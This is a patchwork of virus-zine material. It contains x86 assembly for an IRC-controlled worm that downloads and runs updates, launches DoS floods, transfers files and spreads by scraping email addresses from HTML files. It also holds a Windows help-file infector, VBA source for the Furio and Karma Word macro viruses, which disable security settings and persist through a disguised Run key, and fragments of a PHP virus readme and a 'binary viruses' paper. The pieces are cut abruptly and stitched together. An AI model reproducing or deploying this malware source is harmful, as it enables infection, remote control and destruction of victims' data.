je irc_UPDATE ;update worm if the
;command has been sent
@m_nx0: cmp [esi],'rev!' ;version quering?
jne @m_next
cmp [esi+4],'1000'
jb @m_n
jmp @m_next ;continue
call @m_h
dd 100
@m_h: push edi
call @m_o
dd 1
@m_o: @pushsz 'XTCUpdate'
push offset up_path
push 80000002h
call SHGetValueA ;get the FTP address
pop esi ;from registry
pop ecx
@l_up2: lodsb
inc ecx
test al,al
jne @l_up2
dec esi
mov edi,esi
mov ax,0A0Dh
stosw
inc ecx
inc ecx
pop esi
call irc_send ;send it!
jmp irc_manage
push esi
@endspc
mov byte ptr [esi-1],0
push esi
@endspc
mov byte ptr [esi-1],0
push esi
@endbr
mov byte ptr [esi-1],0
xor eax,eax
push eax
push eax
push eax
push eax
@pushsz 'XTC'
call InternetOpenA ;create the inet handle
test eax,eax
je err_up0
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
call InternetCheckConnectionA ;check if we are already
xchg eax,ecx ;connected to inet
jecxz err_up1 ;quit if not
xor eax,eax
push eax
push eax
push 1
push eax
push eax
push 21
push dword ptr [esp+8+6*4]
push ebx
call InternetConnectA ;connect to FTP server
test eax,eax
je err_up1
xchg eax,ebp
push 0
push 2
push FILE_ATTRIBUTE_NORMAL
push 0
@pushsz 'xtcspawn.exe'
pop edi
push edi
push dword ptr [esp+5*4]
push ebp
call FtpGetFileA ;download the worm
xchg eax,ecx
jecxz err_up2
push 0
push edi
call WinExec ;execute it
jmp end_worm
err_up2:push ebp
call InternetCloseHandle
err_up1:push ebx
call InternetCloseHandle ;close all inet handlez
err_up0:pop eax
pop eax
pop eax
popad
jmp irc_manage
;DOS attack
irc_DOS:pushad
@SEH_SetupFrame <jmp err_dos>
@endspc ;get over the command
call Ascii2Num
push eax
call htons
mov [DOS_sock.sin_port],ax ;save the port number
inc esi
push esi ;ESI = server name (*)
@endbr
mov byte ptr [esi-1],0
call gethostbyname ;*
test eax,eax
je err_dos
mov eax,[eax+HOSTENT_IP]
mov eax,[eax]
mov [DOS_sock.sin_addr],eax ;save the IP
mov [dos_sem],eax
xor eax,eax
@pushsz 'XTC'
push eax
push eax
push offset DOS_Thread
dos_thr:push eax
push eax
call CreateThread ;create separate thread
xchg eax,ecx
jecxz err_dos
push ecx
call CloseHandle ;close its handle
ok_dos: @SEH_RemoveFrame
popad
jmp msg_ok ;reply "ok"
err_dos:@SEH_RemoveFrame
popad
jmp msg_err ;reply "failed"
;logon to MAPI32
mapi_init:
xor eax,eax
push offset MAPIHandle
push eax
push eax
push eax
push eax
push eax
call MAPILogon
ret
call mapi_init
test eax,eax
jne e_spr
mov [ebp],ebp
@pushsz 'XTC'
push eax
push eax
push offset SPREAD_Thread
push eax
push eax
call CreateThread ;create separate thread
xchg eax,ecx
jecxz e_spr
push ecx
call CloseHandle ;close its handle
e_spr: @SEH_RemoveFrame
popad
jmp irc_manage ;and quit
push 6
pop ecx
m_loop: push ecx
push 32
@pushsz 'http://www.therainforestsite.com' ;destination URL
push 1
push esi
@pushsz 'Software\Microsoft\Internet Explorer\Main'
push 80000002h ;key
call SHSetValueA ;set the value
@endsz
pop ecx
loop m_loop
popad
jmp msg_ok ;and reply to user
xor ebx,ebx
push ebx
push ebx
push OPEN_EXISTING
push ebx
push FILE_SHARE_READ
push GENERIC_READ
push esi
call CreateFileA ;open the file
inc eax
je err_send0
dec eax
mov [sendFile],eax
push ebx
push eax
call GetFileSize ;get its size
mov [sendBytes],eax
push ebx
push SOCK_STREAM
push AF_INET
call socket ;create socket
inc eax
je err_send1
dec eax
mov [sendSocket],eax
call GetTickCount
push 1000
pop ecx
xor edx,edx
div ecx
add edx,4000
mov [dccPort],edx
push edx
call htons
mov [DCC_sock.sin_port],ax ;select random port
and [DCC_sock.sin_addr],0 ;number
push sockSize
push offset DCC_sock
push 12345678h
sendSocket = dword ptr $-4
call bind ;hook the port
test eax,eax
jne err_send2
mov eax,'CCD1'-'1'+1
stosd
mov eax,'NES '
stosd
mov ax,' D'
stosw
add dword ptr [esp.Pushad_ebp],10 ;create DCC command
mov esi,ebp
cpy_sm: lodsb
stosb
inc dword ptr [esp.Pushad_ebp]
cmp al,20h
jne cpy_sm
mov ebp,edi
call Num2Ascii
mov eax,edi
sub eax,ebp
inc eax
add dword ptr [esp.Pushad_ebp],eax
mov al,20h
stosb
mov ebp,edi
mov eax,12345678h
sendBytes = dword ptr $-4 ;and file size
call Num2Ascii
mov eax,edi
sub eax,ebp
add eax,4
add dword ptr [esp.Pushad_ebp],eax
mov ax,0D01h
stosw
mov al,0Ah
stosb ;terminate the command
mov ecx,[esp.Pushad_ebp]
mov esi,edi
sub esi,ecx
call irc_send ;send it
push 1
push [sendSocket]
call listen ;switch to listen mode
test eax,eax
jne err_send2
push eax
push eax
push [sendSocket]
call accept ;accept incomming bytez
xchg eax,[sendSocket]
push eax
call closesocket ;close incomming socket
push 0
push dword ptr [ebx]
push offset irc_buffer
push [sendSocket]
call send ;send them
add esi,[ebx]
cmp esi,[sendBytes]
je ok_send ;check if we are finished
cmp [ebx],eax
je l_dcc_send
err_send2:
push [sendSocket]
call closesocket ;close the socket
err_send1:
push 12345678h
sendFile = dword ptr $-4
call CloseHandle ;close the file
err_send0:
err_dcc0:
popad
jmp msg_err ;and reply "failed"
ok_send:push [sendSocket]
call closesocket ;close the socket
push [sendFile]
call CloseHandle ;file
popad
jmp msg_ok ;reply "ok"
@endspc
@endspc
push esi
@endspc
mov byte ptr [esi-1],0
pop esi
xor eax,eax
push eax
push eax
push CREATE_ALWAYS
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
push esi
call CreateFileA ;create new file
inc eax
je err_dcc0
dec eax
mov [dccFile],eax
push 0
push SOCK_STREAM
push AF_INET
call socket ;create socket
inc eax
je err_dcc1
dec eax
mov [dccSocket],eax
@endsz
push esi
@endspc
mov byte ptr [esi-1],0
pop esi
call Ascii2Num
push eax
call htonl
mov [DCC_sock.sin_addr],eax ;get IP
inc esi
call Ascii2Num
push eax
call htons
mov [DCC_sock.sin_port],ax ;port
inc esi
call Ascii2Num
xchg eax,ebx
push sockSize
push offset DCC_sock
push [dccSocket]
call connect ;connect to remote machine
inc eax
je err_dcc2
xor esi,esi
dcc_recv_loop:
push 0
push 1000h
push offset irc_buffer
push [dccSocket]
call recv ;get incomming bytez
inc eax
je err_dcc2
dec eax
sub ebx,eax
add esi,eax
push 0
call @tmp
dcctmp dd ?
@tmp: push eax
push offset irc_buffer
push [dccFile]
call WriteFile ;write them to file
push esi
call htonl
mov ecx,offset dcctmp
mov [ecx],eax
push 0
push 4
push ecx
push [dccSocket] ;send number of
call send ;recieved bytez
test ebx,ebx
jne dcc_recv_loop ;are we finished?
err_dcc1:
call dcc_closefile ;close the file
jmp err_dcc0 ;and quit
err_dcc2:
call dcc_closesock ;disconnect
jmp err_dcc1 ;and quit
dcc_closefile:
push 12345678h
dccFile = dword ptr $-4
call CloseHandle ;close the file
ret
dcc_closesock:
push 12345678h
dccSocket = dword ptr $-4
call closesocket ;disconnect
ret
push 0
push esi
push offset wormname2
call CopyFileA ;copy the worm
push esi
push edi
mov esi,ebp
mov edi,offset temppath
mov edx,edi
@copysz
dec edi
mov eax,'niw\'
stosd
mov eax,'ini.'
stosd
xor al,al
stosb
pop edi
pop esi
inc [lan_res]
push edx
push edi
@pushsz 'run'
push offset win_table+3
call WritePrivateProfileStringA ;modify win.ini
pop ecx
dec byte ptr [lan_drive]
dec ecx
test ecx,ecx
jne ld_lan ;try another disk drive
mov ecx,12345678h
lan_res = dword ptr $-4
jecxz err_lan
popad
jmp msg_ok
err_lan:popad
jmp msg_err
push edi
call gethostbyname ;convert it to IP
xchg eax,ecx
jecxz err_who
mov eax,[ecx+HOSTENT_IP]
mov eax,[eax]
cmp eax,ebx
jne err_who ;reply if matches
popad
jmp msg_ok
err_who:popad
jmp irc_manage
xor eax,eax
push offset pInfo
push offset sInfo
push eax
push eax
push eax
push eax
push eax
push eax
push esi
push eax
call CreateProcessA ;execute it!
mov [esp.Pushad_eax],eax
push [pInfo.hThread]
call CloseHandle
push [pInfo.hProcess]
call CloseHandle ;close all handlez
popad
dec eax
je msg_ok
jmp msg_err
;copies file
irc_COPY:
@endspc
push ecx
push edx
push 0
push esi
push esi
l_copy1:lodsb
cmp al,20h
jne l_copy1
mov byte ptr [esi-1],0
mov [esp+4],esi
@endbr
mov byte ptr [esi-1],0
call CopyFileA
jmp md_dir
;moves/renames file
irc_MOVE:
@endspc
push ecx
push edx
push esi
push esi
l_move1:lodsb
cmp al,20h
jne l_move1
mov byte ptr [esi-1],0
mov [esp+4],esi
@endbr
mov byte ptr [esi-1],0
call MoveFileA
jmp md_dir
;removes file
irc_DEL:@endspc
push ecx
push edx
push esi
push FILE_ATTRIBUTE_NORMAL
push esi
@endbr
mov byte ptr [esi-1],0
call SetFileAttributesA ;blank attributez
test eax,eax
pop ecx
je md_dir
push ecx
call DeleteFileA ;and delete the file
jmp md_dir
;removes directory
irc_RD: @endspc
push ecx
push edx
push esi
@endbr
mov byte ptr [esi-1],0
call RemoveDirectoryA
jmp md_dir
;creates directory
irc_MD: @endspc
push ecx
push edx
push 0
push esi
@endbr
mov byte ptr [esi-1],0
call CreateDirectoryA
jmp md_dir
wr_dir: pushad
mov esi,offset temppath+WFD_szFileName
@l_dir: lodsb
inc ecx
stosb
test al,al
jne @l_dir
dec edi
mov word ptr [edi],0A0Dh
inc ecx
mov esi,[esp.Pushad_edx]
call irc_send ;send the filname
push offset temppath
push [fHandle]
call FindNextFileA ;find another
dec eax
popad
je wr_dir
pushad
push 12345678h
fHandle = dword ptr $-4
call FindClose ;close search handle
popad
jmp msg_ok
irc_manage EndP
;input:
;ECX - size of data to send
;ESI - ptr to data to send
irc_send Proc
push 0
push ecx
push esi
push [hSocket]
call send
xchg eax,ecx
ret
irc_send EndP
irc_recv_100h:
mov ecx,100h
;ECX - size of data to recieve
;output: ESI - ptr to buffer
irc_recv Proc
push edi
push ecx
mov esi,offset irc_buffer
push esi
l_recv: push 0
push 1
push esi
push [hSocket]
call recv
mov dl,[esi]
inc esi
cmp dl,0Ah
jne l_recv
pop esi
pop ecx
pop edi
ret
irc_recv EndP
CRC32 Proc
push ecx ;procedure for
push edx ;calculating CRC32s
push ebx ;at run-time
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx
pop ecx
ret
CRC32 EndP
push 10
pop ecx
g_str: xor edx,edx
div ecx
add edx,'0'
xchg eax,edx
stosb
xchg eax,edx
test eax,eax
jne g_str
pop esi
xchg esi,edi
dec esi
cpy_num:std
lodsb
cld
stosb
cmp al,11h
jne cpy_num
dec edi
pop esi
ret
Num2Ascii EndP
push sockSize
push offset DOS_sock
push ebx
call connect ;connect there
inc eax
je n_dos
push sockSize
push offset DOS_sock
push ebp
call connect ;--- "" ---
inc eax
je n_dos
push 0
push 1000h
push offset irc_buffer
push ebx
call send ;send there some data
push 0
push 1000h
push offset irc_buffer
push ebp
call send ;--- "" ---
mov ecx,12345678h
dos_sem = dword ptr $-4 ;quit if the semaphore
jecxz end_dos ;is cleared
jmp do_dos
end_dos:popad
SVCHandler:
ret
DOS_Thread EndP
push edi
call SetCurrentDirectoryA ;go to there
dec eax
jne end_spread
push eax
call SetCurrentDirectoryA ;go to that directory
push esi
call FindClose ;close the search handle
jmp b_dir
push esi
call FindClose ;close the search handle
end_dir:push edi
@pushsz '*.*htm*'
call FindFirstFileA ;find first *.*htm* file
inc eax
je end_spread
dec eax
xchg eax,esi
p_htmlz:mov ecx,0
spread_sem = dword ptr $-4
jecxz end_spread2 ;check the semaphore
call parse_html ;search inside html file
;and find there mail
;address and send itself
push edi ;to there
push esi
call FindNextFileA ;find next file
dec eax
je p_htmlz
end_spread2:
push esi
call FindClose ;close search handle
end_spread:
popad
ret
parse_html:
pushad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ
push GENERIC_READ
push offset temppath+WFD_szFileName
call CreateFileA ;open the file
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
call CreateFileMappingA ;create the file mapping
test eax,eax
je ph_close
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
call MapViewOfFile ;map the file
test eax,eax
je ph_close2
xchg eax,esi
push 0
push ebx
call GetFileSize ;get its size
xchg eax,ecx
jecxz ph_close3
ls_scan_mail:
call @mt
db 'mailto:'
@mt: pop edi
l_scan_mail:
pushad
push 7
pop ecx
rep cmpsb ;search for "mailto:"
popad ;string
je scan_mail ;check the mail address
inc esi
loop l_scan_mail ;in a loop
ph_close3:
push esi
call UnmapViewOfFile ;unmap view of file
ph_close2:
push ebp
call CloseHandle ;close file mapping
ph_close:
push ebx
call CloseHandle ;close the file
popad
ret
scan_mail:
xor edx,edx
add esi,7
mov edi,offset mail_address ;where to store the
push edi ;mail address
n_char: lodsb
cmp al,' '
je s_char
cmp al,'"'
je e_char
cmp al,''''
je e_char
cmp al,'@'
jne o_a
inc edx
o_a: stosb
jmp n_char
s_char: inc esi
jmp n_char
e_char: xor al,al
stosb
pop edi
test edx,edx ;if EDX=0, mail is not
je ls_scan_mail ;valid (no '@')
call mapi_send
jmp ls_scan_mail
SPREAD_Thread EndP
push 0
call ExitThread ;quit the thread
service_start:
pushad
@SEH_SetupFrame <jmp end_worm>
call _ss
ss_: dd 10h or 20h
dd 4
dd 0
dd 0
dd 0
dd 0
dd 0
_ss: push eax
call SetServiceStatus ;set the service status
call CloseServiceHandle ;close service handle
jmp e_svc ;and continue...
SVCRegister EndP
.486p
.model flat
locals
extrn ExitProcess:PROC
HLPHEADER struc
hhMagic dd ?
hhDirectoryStart dd ?
hhNonDirectoryStart dd ?
hhEntireFileSize dd ?
HLPHEADER ends
HLPFILEHEADER struc
fhReservedSpace dd ?
fhUsedSpace dd ?
fhFileFlags db ?
HLPFILEHEADER ends
BTREEHEADER struct
bthMagic dw ?
bthFlags dw ?
bthPageSize dw ?
bthStructure db 10h dup(?)
bthMustBeZero dw ?
bthPageSplits dw ?
bthRootPage dw ?
bthMustBeNegOne dw ?
bthTotalPages dw ?
bthNLeves dw ?
bthTotalEntries dd ?
BTREEHEADER ends
.DATA
.CODE
inicio:
push eax ; simulate the callback for
push eax ; 1st generation
push offset goOut
sub esp,((vSize/2)+1)*2 ; why i'm doing this? ;)
jmp virusBegin
goOut:
push 0h
call ExitProcess
lodsd
add eax,K32WIN9X
mov dword ptr [address+ebp],eax
lodsd
add eax,K32WIN9X
mov dword ptr [names+ebp],eax
lodsd
add eax,K32WIN9X
mov dword ptr [ordinals+ebp],eax
sub esi,16
lodsd
mov dword ptr [nexports+ebp],eax
xor edx,edx
mov dword ptr [expcount+ebp],edx
lea eax,FSTAPI+ebp
searchl:
mov esi,dword ptr [names+ebp]
add esi,edx
mov esi,dword ptr [esi]
add esi,K32WIN9X
push eax edx
movzx di,byte ptr [eax+4]
call CRC32
xchg ebx,eax
pop edx eax
cmp ebx,dword ptr [eax]
je fFound
add edx,4
inc dword ptr [expcount+ebp]
push edx
mov edx,dword ptr [expcount+ebp]
cmp dword ptr [nexports+ebp],edx
pop edx
je quitSEH
jmp searchl
fFound:
shr edx,1
add edx,dword ptr [ordinals+ebp]
xor ebx,ebx
mov bx,word ptr [edx]
shl ebx,2
add ebx,dword ptr [address+ebp]
mov ecx,dword ptr [ebx]
add ecx,K32WIN9X
mov dword ptr [eax+5],ecx
add eax,9
xor edx,edx
mov dword ptr [expcount+ebp],edx
lea ecx,ENDAPI+ebp
cmp eax,ecx
jb searchl
findNext:
mov eax,dword ptr [find_data.nFileSizeLow+ebp]
mov ecx,PADDING ; test if it's infected
xor edx,edx ; yet
div ecx
or edx,edx ; reminder is zero?
jz skipThisFile
lea esi,find_data.cFileName+ebp
call infect
skipThisFile:
lea esi,find_data+ebp
push esi
push dword ptr [findHnd+ebp]
call dword ptr [_FindNextFileA+ebp] ; Find next file
or eax,eax
jnz findNext
quitSEH:
xor esi,esi ; quit SEH
pop dword ptr fs:[esi]
pop eax
popad
add esp,((vSize/2)+1)*2 ; fix stack
xor eax,eax ; return FALSE
ret 8 ; pop the args of the call
; (are two: 2*4=8 bytes)
exception:
xor esi,esi ; we are not under
mov eax,dword ptr fs:[esi] ; win9x... a pitty
mov esp,dword ptr [eax]
jmp quitSEH
;
; does the hlp infection
; IN: esi addr of file name
;
infect:
xor eax,eax
push eax
push 80h
push 3h
push eax
push eax
push 80000000h OR 40000000h
push esi
call dword ptr [_CreateFileA+ebp]
inc eax
jz errorOut
dec eax
xor eax,eax
push eax
push eax
push eax
push 4h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jc errorOutClose
xor eax,eax
push eax
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [mfHnd+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz errorOutCloseMap
; get file size information in the header (not the same than
; 'file in disk' size)
mov ecx,dword ptr [eax.hhEntireFileSize]
mov dword ptr [fileSize+ebp],ecx
searchSystemDir:
cmp dword ptr [edi],'SYS|'
je foundSystemDir
inc edi
loop searchSystemDir
jmp notNiceHlp
foundSystemDir:
; as i only infect non-indexed hlp files, i'm sure the
; data that follows the |SYSTEM zstring is the offset of
; the directory. 1st skip the zstring
add edi,8
; now goto to the directory (offset from hlp header)
; and set the new system directory at the end of file
mov esi,dword ptr [fileSize+ebp]
xchg esi,dword ptr [edi]
mov edi,esi
add edi,eax
; check version
mov esi,edi
add esi,0ch
cmp word ptr [edi+2],10h
ja noTitleHere
bufferOk:
mov dword ptr [mHnd+ebp],eax
popad
macroDoneFix:
mov al,0b0h
mov ah,90h
stosw
mov ax,5066h
stosw
macroDone:
; end the macro
lea esi,hlpMacro1+ebp
mov ecx,hlpMacroSize1
rep movsb
push eax
call dword ptr [_UnmapViewOfFile+ebp]
xor eax,eax
push eax
push dword ptr [padSize+ebp]
push eax
push 4h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jc errorOutClose
xor eax,eax
push dword ptr [padSize+ebp]
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [mfHnd+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz errorOutCloseMap
push eax
push 00008000h
push 0h
push dword ptr [mHnd+ebp]
call dword ptr [_VirtualFree+ebp]
pop eax
notNiceHlp:
push eax
call dword ptr [_UnmapViewOfFile+ebp]
errorOutCloseMap:
push dword ptr [mfHnd+ebp]
call dword ptr [_CloseHandle+ebp]
errorOutClose:
push dword ptr [fHnd+ebp]
call dword ptr [_CloseHandle+ebp]
errorOut:
ret
;
; CRC32
;
; IN: esi offset of data to do CRC32
; edi size to do CRC32
;
; OUT:
; eax CRC32
;
; Original routine by Vecna. Gracias!
; This is one of these piezes of code that became essential to
; the virus coder.
;
CRC32:
cld
xor ecx,ecx
dec ecx
mov edx,ecx
push ebx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
pop ebx
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
copyright db '< AYUDA! Coded by Bumblebee/29a >'
messForAvers db 0dh,0ah
db 'Cumpliendo con mi oficio',0dh,0ah
db 'piedra con piedra, pluma a pluma,',0dh,0ah
db 'pasa el invierno y deja',0dh,0ah
db 'sitios abandonados',0dh,0ah
db 'habitaciones muertas:',0dh,0ah
db 'yo trabajo y trabajo,',0dh,0ah
db 'debo substituir tantos olvidos,',0dh,0ah
db 'llenar de pan las tinieblas,',0dh,0ah
db 'fundar otra vez la esperanza.',0dh,0ah
CrcMapViewOfFile dd 0797b49ech
size1 db 14
_MapViewOfFile dd 0
CrcCreatFileMappingA dd 096b2d96ch
size2 db 19
_CreateFileMappingA dd 0
CrcUnmapViewOfFile dd 094524b42h
size3 db 16
_UnmapViewOfFile dd 0
CrcCloseHandle dd 068624a9dh
size4 db 12
_CloseHandle dd 0
CrcFindFirstFileA dd 0ae17ebefh
size5 db 15
_FindFirstFileA dd 0
CrcFindNextFileA dd 0aa700106h
size6 db 14
_FindNextFileA dd 0
CrcFindClose dd 0c200be21h
size7 db 10
_FindClose dd 0
CrcVirtualAlloc dd 04402890eh
size8 db 13
_VirtualAlloc dd 0
CrcVirtualFree dd 02aad1211h
size9 db 12
_VirtualFree dd 0
ENDAPI label byte
; several handles
fHnd dd 0
mfHnd dd 0
mHnd dd 0
; to store... erm
fileSize dd 0
; file size with padding
padSize dd 0
; the size of the generated system file
systemSize dd 0
; used into API search
address dd 0
names dd 0
ordinals dd 0
nexports dd 0
expcount dd 0
; for find files
hlpMask db '*.hlp',0,0
findHnd dd 0
find_data WIN32_FIND_DATA <?>
ends
end inicio
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FURIO.TXT]ÄÄÄ
Furio Word Macro Virus
Version(s) v1.00
Virus Description : The Furio virus does not infect the Normal Template at
all. It also does not rely on Auto run macros to spread.
This makes it very different to the common macro virus.
When an infected document is run the virus sets all of
the Word virus protection/Security settings to their
lowest. It then registers the computer username to "The
WalruS". It then exports its macro code to C:\Windows\Furio.drv
and sets this file as hidden. It then exports its UserForm
to "C:\Windows\AboutFrm.Frm". The virus then checks to see
whether its installed by seeing if the file
"C:\Program Files\Microsoft Office\Office\STARTUP\Furio.dot"
exists and If not then installs itself. It does this by opening
the normal template as a document, infecting it with the exported
macros and UserForm then saves it to
"C:\Program Files\Microsoft Office\Office\STARTUP\Furio.dot" and
closing it. All of the above is done on AutoClose. The
normal template is not infected and therefore does not
increase in size. Furio.dot is now installed everytime
word is opened due to it being in the Word StartUp folder.
To infect documentsThe Furio.dot hooks FileOpen, FileSave
and FilePrintDefault macros. They behave as normal however
they also infect and save the active document should the
marker text "' Furio" not be present on line 1 of the code.
Sub SpreadTheWord()
On Error Resume Next
If ActiveDocument.VBProject.VBComponents.Item("Furio").CodeModule.Lines(1, 1) <> "'
Furio" Then
ActiveDocument.VBProject.VBComponents.Import ("C:\Windows\Furio.drv")
ActiveDocument.VBProject.VBComponents.Import ("C:\Windows\AboutFrm.frm")
ActiveDocument.Save
End If
End Sub
Sub FileOpen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Call SpreadTheWord
End Sub
Sub FileSave()
On Error Resume Next
Call SpreadTheWord
ActiveDocument.Save
End Sub
Sub FilePrintDefault()
On Error Resume Next
Call SpreadTheWord
If Second(Now) = 59 Then Selection.TypeText " Please Select Help About For More
Information!"
ActiveDocument.PrintOut
End Sub
Sub Payload()
On Error Resume Next
Options.BlueScreen = True
MyApp = Shell("notepad.exe", 1)
SendKeys "Hello there!~~Im the WalruS. Welcome To My New Creation - Furio~~~///0-0\\\
WalruS 09/00", True
AppActivate (MyApp)
End Sub
Sub HelpAbout()
On Error Resume Next
AboutFrm.Show
End Sub
Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub
Version(s) v1.00
Number of Macros : 2
Virus Description : The Karma virus first checks to see if the active
document is called Document1. If it is then it dosent infect. This prevents
the virus from trying to infect when word is run without a document. When an
document is run the virus sets all of the Word virus protection/Security
settings to their lowest. It then exports its macro code to C:\Windows\Karma.drv
and sets this file as hidden. It then imports this code to the Normal Template
and Active Document. Next the virus drops a VBS file "C:\Windows\Backup.vbs"
and sets it as a hidden file. The VBS file is run on boot up of the PC by
using the same registry line as Norton 2000 AV Auto-Protect thus disabling
anti-virus protection on the PC should Norton be installed. All of the above
happens on Auto Open.
When the infected document is closed the virus creates a counter in the Win.ini
file. This counter is document specific. Therefore every infected document opened
and closed in word on the users PC has its own counter in win.ini. The counters
name contains the documents directory also to ensure that the counter is
document specific. Next the virus checks to see if the value of the counter is
greater than 250. if it is then the contents of the document are erased and
over written by the message "This Document has expired due to Bad Karma". This
message is in "Space Woozies" font of size 100 and in bold. Finally the virus
checks to see if the document has been saved and if not saves it. All of the
above happens on Auto Close.
With Options
.VirusProtection = False
.ConfirmConversions = False
.SaveNormalPrompt = False
End With
Application.DisplayStatusBar = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Norton Auto-Protect") =
"C:\Windows\Backup.vbs"
End Sub
Introduction
------------
After being reading about Samhain, I could'nt help noticing the
power of this language. This virus (or call it a companion trojan)
is just intended to be a proof of concept code and is NOT DESIGNED
to be in the wild in any manner. I wanted that other more capable
and brilliant vx authors should look at PHP for their
future projects. This was also needed to keep my spirits up
with DIV (My main vx project) becoming very depressing.
Technical Explanation
---------------------
First let me tell you how to create enviroment for testing and improving
the bug.
a) For Win 9x/NT/2k users
Now fire up localhost and run the pirus.php, after successful "install"
of the bug .. the test.php should have a line at the end of the file
which reads
Well you ppl are born clever :). Incase u run into ne problem, seek the
linux spirit inside u or contact me !
Possible improvements :
-----------------------
Shell script, encryption, polymorphic like samhain
,network ability, better stealth, appending, good host scripts
which will be downloaded and used by many lame webmasters
Greets (random) :
-----------------
E-MAIL : maskbits@crosswinds.net
WWW : www.vxi.cjb.net
mQENAzng1ucAAAEIAMCcpi/l0LxyOT8FSlR90ptib+zOl7ZFHA5BNGiPl+8KQsGR
RNdD9F1PA8rBUO2NPOXLqXFDQx2wXtnPkL6z3/NOcA7SUmRq3EbTt/bYgP6ZJ1zQ
kGZK0zCMjEe2WKtldqyt6Fb3K/ulJsMQ4eQ1k5MGBZ8/JMZlVi5shCVbPwPwOJBk
HI0CREpeGPt8AkCLsjTfzqgzYMWpr7K9YAnzlhV/9EPCZaTfIbRT6uREzxyBrt2K
ntorM1KUgGmmpiPDPGg0H2boevX0XhU0nqThXM4bIqH9AWr55h9kiZTN4kCM717y
NM7mym+McJavMwqgG9Ehdbhunp7ez/saMmL5UAcABRG0Jk1hc2tCaXRzL1ZYSSA8
bWFza2JpdHNAY3Jvc3N3aW5kcy5uZXQ+iQEVAwUQOeDW58/7GjJi+VAHAQFQOwf9
GbEpvJOC5eotRiF6MnkKgZACADyWM6U9NjDRLtD1TxmPGQOCxplJaxYY/cU4o6S1
QBK3uX9Maac/q/miaTmsNb5quijTPmbQ1h9q1BqtsLvRlvmTpUjMhTb2/qiASB+Y
8ZTrn9L1zkVYuA5t23eAVQR5dKVWBdPrmCkYOH5lcm3G/kSdnwAt50LCiA4bqhlC
4HSl2HxW0+bTIdc/Iddcm380NoH1BzhjmRSY9fI3vPYWmsrBEgNpDShr+TAPr1PF
VWpt+o2jgId9assancEvj6rgrLeHnG+3jzudflUp3M6lF5x4Urjg5OXETDCPSmJ+
4l3G3HBiUYT9X9iwm8TQqg==
=1J7x
-----END PGP PUBLIC KEY BLOCK-----
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[PIRUS.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[BINVIRUS.TXT]ÄÄÄ
Binary Viruses:
===============
To my life's woman
1. Abstract:
---------
I would not be wrong if I say that the one reading this paper knows 'Imposible Mission'
movies. Obviously, I don't want to discuss its artistic details, likes or dislikes. But,
what we surely all agree about these films, is the technological power they show. It is
amazing, we were thinking that it was not possible to overcome James Bond's gadjets ...
But we were definitely wrong ... Once again, Ethan Hunt was showing that it is always
possible to go one step beyond.
At this moment, I would like to recall that 'two-flavoured chewing gum' that Ethan Hunt
was given at 'Imposible Mission I'. That gum was nothing but a binary plastic explosive.
Each of those flavours were harmless when they were alone, but terribly powerful when
joined together. In this case, the movie-star had only 5 seconds left to scape before
the explosion took place.
Ok, as you can imagine, this paper is about to explain how to take this behaviour into
the digital world: the binary virues. The word 'virus' has been used on its widest
meaning. 'Virus' as the whole family of programs that share common goals: execute code
and expand over foreing machines entering them by more or less furtive means. The final
intention of that execution varies with the program itself.
Worms and Trojan Horses are, inside the virii world, the ones that better match the
scenarios we are going to discuss here. One binary worm it is the one structured in two
pieces, each one depends on the other to achieve the final goal what it was created for.
If we remove the ability to self-spread and self-reproduce, we would have a binary trojan.
On this particular case, the trojan would only manifest its presence and activity when the
the other part took place.
One binary virus is just another example of non-authorized code execution which can be
potentially harmful. Over the following pages, we will study what is a binary virus. We
will see one implementation example and will try to analyze possible enhancements and
